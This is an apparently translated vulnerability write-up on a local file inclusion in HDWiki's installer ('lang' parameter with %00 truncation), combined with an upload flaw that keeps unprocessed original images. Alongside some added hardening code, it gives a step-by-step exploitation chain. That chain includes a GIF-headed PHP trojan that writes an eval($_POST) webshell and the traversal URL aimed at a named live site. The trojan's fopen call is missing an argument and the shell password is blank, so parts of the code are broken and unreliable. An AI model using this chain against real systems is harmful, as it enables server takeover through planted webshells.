Vulnerable file: install/install.php
Key code:
<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define('IN_HDWIKI', TRUE);
define('HDWIKI_ROOT', '../');
$lang_name = $_COOKIE['lang_name']; /* lang_name is taken straight from the cookie without any filtering */
if (isset($_REQUEST['lang'])) { /* only checks whether the variable is set; if it is, the value goes into the program body */
    $lang_name = $_REQUEST['lang']; /* the lang value obtained via GET is put into lang_name unfiltered, overriding the cookie value above */
    setcookie('lang_name', $lang_name);
}
if (!$lang_name) { /* skipped when lang_name is non-empty; otherwise lang_name is initialised to the default */
    $lang_name = 'zh';
}
require HDWIKI_ROOT . "/lang/$lang_name/install.php"; /* trivially bypassed: the rest of the path can be truncated with %00, after which no error occurs */
require HDWIKI_ROOT . '/version.php';
require HDWIKI_ROOT . '/model/base.class.php';
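For comparison, the following is an added hardened version of the language selection shown above. It is example code written for this write-up, not HDWiki's own code; it assumes the same HDWIKI_ROOT layout with one directory per language under /lang/ and that the function name resolve_lang_name is new. The value from the request or cookie is never used to build a path until it has been matched, character by character, against the names of the language directories that actually exist, which rejects "../", embedded NUL bytes and anything else that is not a plain directory name:

```php
<?php
// Added example (not HDWiki code): hardened replacement for the language
// selection in install/install.php. Assumes one directory per language
// under HDWIKI_ROOT . '/lang/'.
define('HDWIKI_ROOT', '../');

/**
 * Return a safe language directory name, or $default when the supplied value
 * is anything other than the name of an existing language directory.
 */
function resolve_lang_name($candidate, $default = 'zh')
{
    // First gate: a plain directory name only (letters, digits, '-' and '_').
    // This rejects path separators, "..", and NUL bytes ("%00") outright.
    if (!is_string($candidate) || !preg_match('/^[A-Za-z0-9_-]{1,16}$/', $candidate)) {
        return $default;
    }

    // Second gate: compare against the real language directories instead of
    // trusting the value to form a path.
    $available = array();
    foreach (glob(HDWIKI_ROOT . '/lang/*', GLOB_ONLYDIR) as $dir) {
        $available[] = basename($dir);
    }
    return in_array($candidate, $available, true) ? $candidate : $default;
}

// Request value still takes precedence over the cookie, as in the original,
// but both go through the same validation and only a validated name is
// written back into the cookie.
$lang_name = isset($_REQUEST['lang'])
    ? $_REQUEST['lang']
    : (isset($_COOKIE['lang_name']) ? $_COOKIE['lang_name'] : '');
$lang_name = resolve_lang_name($lang_name);
setcookie('lang_name', $lang_name);

require HDWIKI_ROOT . "/lang/$lang_name/install.php";
```

The whitelist comparison is what matters: a regular expression alone would still let a future change (for example allowing dots in language names) reopen the traversal, whereas matching against the directory listing means the include path can only ever point at a shipped language directory. Independently of this fix, the installer should not be reachable on a production site at all, which removes the sink entirely.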
Analysis:
From the source code the problem is clear: we only need to upload an image containing PHP code and include it. The difficulty is that HDWiki processes the image during upload. Uploading PHP code directly with an image extension is not feasible, and neither is binding (copy-merging) an image with the code: during debugging I found that the entire content of the uploaded image is processed, so the code does not survive. During image processing the program first checks whether the file header is in an image format; after that rough check it does not write the uploaded file to the server directly but goes on to process the image, which is why no PHP code can be found when the uploaded image is opened in Notepad. Their upload module has a serious defect, though: while processing the image, the program also stores the original uploaded file on the server, and that original is not processed at all. So as long as the original file is included, a shell can be obtained.
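The defect described above is that the unprocessed original is kept next to the processed copy. The following is an added example, not HDWiki code, of how an avatar upload can be stored so that only bytes generated by the image library ever reach disk; the function name store_reencoded_avatar, the destination directory and the size limit are assumptions. The raw upload is decoded from its bytes (so a fake header or a misleading extension does not matter), written back out as a freshly encoded JPEG, and the temporary file is removed without any "_src" copy being kept:

```php
<?php
// Added example (not HDWiki code): store an uploaded avatar only after
// re-encoding it through GD. Assumes the GD extension is loaded and that
// $dest_dir is writable and served as static content (no script execution).
function store_reencoded_avatar($tmp_path, $dest_dir, $user_id, $max_bytes = 2097152)
{
    // Accept only files that really came from this request's upload and
    // are within the size budget.
    if (!is_uploaded_file($tmp_path) || filesize($tmp_path) > $max_bytes) {
        return false;
    }

    // Decode from the raw bytes. This fails for anything that is not a real
    // image and ignores the client-supplied name, extension and MIME type.
    $img = @imagecreatefromstring(file_get_contents($tmp_path));
    if ($img === false) {
        @unlink($tmp_path);
        return false;
    }

    // Write a newly encoded JPEG: comment blocks and data appended after the
    // image in the original are not carried over into the output file.
    $out = sprintf('%s/%d.jpg', rtrim($dest_dir, '/'), (int) $user_id);
    $ok = imagejpeg($img, $out, 85);
    imagedestroy($img);

    // The temporary upload is discarded in every case; the original is never
    // stored under a second name.
    @unlink($tmp_path);

    return $ok ? $out : false;
}
```

Re-encoding removes the specific defect in this write-up (the untouched original on disk), but it should be treated as one layer, not a guarantee: the upload directory must also be one from which the web server executes no scripts, and, as the install.php code shows, an include that accepts user-controlled paths will find any readable file regardless of how it was written. Fixing the include sink is what closes the chain.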
Exploitation process:
1. Register a user on the target HDWiki site.
2. Upload an image Trojan as the avatar in personal management. Its content is as follows:
---------------------------------------------------------------------------
GIF89a
<?php
$fp = @fopen("HYrz.php", );
@fwrite($fp, '<' . '?php ' . 'eval($_POST[a]);' . '?' . '>');
@fclose($fp);
?>
---------------------------------------------------------------------------
3. Right-click to get the address of the uploaded image, for example: http://www.bkjia.com/uploads/userface/2/2.jpg?0.8622666412804486 (only http://www.bkjia.com/uploads/userface/2/2.jpg is needed).
Although the address is obtained, that file does not exist. Change 2.jpg to 2_src.jpg, for example: http://www.bkjia.com/uploads/userface/2/2_src.jpg.
4. Access: http://www.bkjia.com/install/install.php?lang=../uploads/userface/2/2_src.jpg%00 (note: the "2" here and above depends on the actual user ID; for user 5 it would be ?lang=../uploads/userface/5/5_src.jpg%00).
5. Connect with a one-line shell client: http://www.bkjia.com/install/HYrz.php, password:
Test environment:
Web server: Windows XP + Apache 2.2.15
allow_url_fopen On
allow_url_include Off
magic_quotes_gpc Off
From: HYrz